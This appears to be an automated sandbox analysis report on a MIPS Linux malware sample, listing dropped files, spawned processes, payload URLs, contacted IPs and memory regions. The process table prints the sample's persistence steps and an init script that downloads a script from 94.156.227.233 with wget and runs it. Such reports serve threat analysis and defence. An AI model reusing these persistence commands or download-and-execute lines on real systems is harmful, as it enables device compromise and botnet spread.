Files

File Path | Type | Category | Malicious
---|---|---|---
mips.nn.elf | ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | initial sample |
/etc/init.d/mips.nn.elf | POSIX shell script, ASCII text executable | dropped |
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped |
/etc/profile | ASCII text | dropped |
/etc/rc.local | POSIX shell script, ASCII text executable | dropped |
/boot/bootcmd | ASCII text | dropped |
/etc/inittab | ASCII text | dropped |
/etc/motd | ASCII text | dropped |
/etc/systemd/system/custom.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |
/tmp/qemu-open.6Os42J (deleted) | ASCII text, with no line terminators | dropped |
Processes

Path | Cmdline | Malicious
---|---|---
/tmp/mips.nn.elf | `/tmp/mips.nn.elf` |
/tmp/mips.nn.elf | - |
/bin/sh | `sh -c "systemctl enable custom.service >/dev/null 2>&1"` |
/bin/sh | - |
/usr/bin/systemctl | `systemctl enable custom.service` |
/tmp/mips.nn.elf | - |
/bin/sh | `sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"` |
/bin/sh | - |
/usr/bin/chmod | `chmod +x /etc/init.d/system` |
/tmp/mips.nn.elf | - |
/bin/sh | `sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"` |
/bin/sh | - |
/usr/bin/ln | `ln -s /etc/init.d/system /etc/rcS.d/S99system` |
/tmp/mips.nn.elf | - |
/bin/sh | `sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"` |
/tmp/mips.nn.elf | - |
/bin/sh | `sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"` |
/bin/sh | - |
/usr/bin/chmod | `chmod +x /etc/init.d/mips.nn.elf` |
/tmp/mips.nn.elf | - |
/bin/sh | `sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"` |
/bin/sh | - |
/usr/bin/mkdir | `mkdir -p /etc/rc.d` |
/tmp/mips.nn.elf | - |
/bin/sh | `sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"` |
/bin/sh | - |
/usr/bin/ln | `ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf` |
/tmp/mips.nn.elf | - |
/tmp/mips.nn.elf | - |
/tmp/mips.nn.elf | - |
/tmp/mips.nn.elf | - |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` |
/usr/lib/systemd/systemd | - |
/usr/lib/systemd/system-environment-generators/snapd-env-generator | `/usr/lib/systemd/system-environment-generators/snapd-env-generator` |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` |
/usr/libexec/gnome-session-binary | - |
/bin/sh | `/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping` |
/usr/libexec/gsd-housekeeping | `/usr/libexec/gsd-housekeeping` |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` |

36 additional processes are not shown in this excerpt.
URLs

Name | IP | Malicious
---|---|---
http://94.156.227.233/curl.sh | unknown |
http://94.156.227.233/lol.sh | unknown |
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | unknown |
http://94.156.227.233/ | unknown |
IPs

IP | Domain | Country | Malicious
---|---|---|---
71.85.172.121 | unknown | United States |
52.102.179.50 | unknown | United States |
130.99.1.125 | unknown | United States |
30.241.227.29 | unknown | United States |
210.122.139.47 | unknown | Korea Republic of |
3.90.193.102 | unknown | United States |
96.15.206.62 | unknown | United States |
98.62.209.133 | unknown | United States |
133.176.177.55 | unknown | Japan |
125.255.90.208 | unknown | Japan |
43.213.178.195 | unknown | Japan |
123.196.85.13 | unknown | China |
16.232.191.72 | unknown | United States |
60.248.84.35 | unknown | Taiwan; Republic of China (ROC) |
179.120.169.70 | unknown | Brazil |
140.45.68.171 | unknown | United States |
24.104.27.194 | unknown | United States |
213.237.62.150 | unknown | Denmark |
65.242.120.220 | unknown | United States |
23.57.209.219 | unknown | United States |
177.28.201.152 | unknown | Brazil |
74.46.133.37 | unknown | United States |
123.62.119.123 | unknown | China |
78.160.247.18 | unknown | Turkey |
60.146.162.245 | unknown | Japan |
186.12.11.37 | unknown | Argentina |
20.25.224.111 | unknown | United States |
45.2.160.226 | unknown | Canada |
117.198.224.153 | unknown | India |
216.134.58.20 | unknown | United States |
66.195.45.192 | unknown | United States |
222.39.120.74 | unknown | China |
204.181.145.33 | unknown | United States |
8.195.247.249 | unknown | United States |
88.241.210.57 | unknown | Turkey |
210.178.237.249 | unknown | Korea Republic of |
215.50.167.215 | unknown | United States |
78.140.240.209 | unknown | Russian Federation |
57.236.105.99 | unknown | Belgium |
18.159.41.41 | unknown | United States |
197.153.128.251 | unknown | Morocco |
211.52.79.67 | unknown | Korea Republic of |
93.209.197.112 | unknown | Germany |
70.199.108.94 | unknown | United States |
26.0.17.143 | unknown | United States |
43.112.217.239 | unknown | Japan |
159.73.177.227 | unknown | Australia |
68.177.81.58 | unknown | United States |
202.61.108.43 | unknown | unknown |
111.233.254.164 | unknown | Japan |
34.8.131.16 | unknown | United States |
112.207.142.132 | unknown | Philippines |
197.78.59.83 | unknown | South Africa |
83.59.238.196 | unknown | Spain |
18.45.150.132 | unknown | United States |
50.219.45.146 | unknown | United States |
106.194.185.156 | unknown | India |
140.44.148.110 | unknown | United States |
110.250.130.150 | unknown | China |
82.173.157.58 | unknown | Netherlands |
25.190.203.72 | unknown | United Kingdom |
112.131.194.70 | unknown | China |
214.218.33.123 | unknown | United States |
180.51.101.201 | unknown | Japan |
123.162.233.163 | unknown | China |
177.112.78.39 | unknown | Brazil |
2.29.117.56 | unknown | United Kingdom |
134.125.19.84 | unknown | United States |
163.168.179.99 | unknown | Switzerland |
34.201.15.152 | unknown | United States |
51.249.201.114 | unknown | United States |
25.91.159.36 | unknown | United Kingdom |
31.71.159.62 | unknown | United Kingdom |
16.16.85.23 | unknown | United States |
158.68.106.184 | unknown | United States |
65.188.142.178 | unknown | United States |
109.202.11.184 | unknown | Russian Federation |
99.214.146.212 | unknown | Canada |
23.190.38.252 | unknown | Reserved |
50.99.128.40 | unknown | Canada |
53.29.64.118 | unknown | Germany |
63.14.20.134 | unknown | United States |
179.147.151.249 | unknown | Brazil |
142.139.14.245 | unknown | Canada |
162.89.43.62 | unknown | United States |
84.59.198.152 | unknown | Germany |
101.241.166.175 | unknown | China |
62.79.232.196 | unknown | Denmark |
40.176.186.198 | unknown | United States |
39.189.18.12 | unknown | China |
198.207.3.101 | unknown | United States |
46.147.58.102 | unknown | Russian Federation |
139.38.79.26 | unknown | United States |
125.40.151.243 | unknown | China |
216.186.108.115 | unknown | United States |
18.43.36.150 | unknown | United States |
24.100.12.157 | unknown | United States |
223.95.137.37 | unknown | China |
115.217.42.191 | unknown | China |
68.167.155.178 | unknown | United States |

90 additional IPs are not shown in this excerpt.
Memdumps

Base Address | Regiontype | Protect | Malicious
---|---|---|---
7fcca4421000 | page execute read | |
7fcd2a143000 | page read and write | |
7fcd29bf1000 | page read and write | |
7fcd24000000 | page read and write | |
55a7798c9000 | page execute and read and write | |
7fcd2a26c000 | page read and write | |
7fcca4467000 | page read and write | |
55a77aa9d000 | page read and write | |
7fcd2a274000 | page read and write | |
55a777639000 | page execute read | |
7fcca4462000 | page read and write | |
55a7778cb000 | page read and write | |
7ffddbe11000 | page read and write | |
55a7778c1000 | page read and write | |
7fcd24021000 | page read and write | |
7fcd29c31000 | page read and write | |
7fcd29592000 | page read and write | |
7fcd295a0000 | page read and write | |
55a7798e0000 | page read and write | |
7ffddbff1000 | page execute read | |
7fcd29850000 | page read and write | |
7fcd29c14000 | page read and write | |
7fcd2a2b9000 | page read and write | |
7fcd29f62000 | page read and write | |
7fcd28d8a000 | page read and write | |

15 additional memdumps are not shown in this excerpt.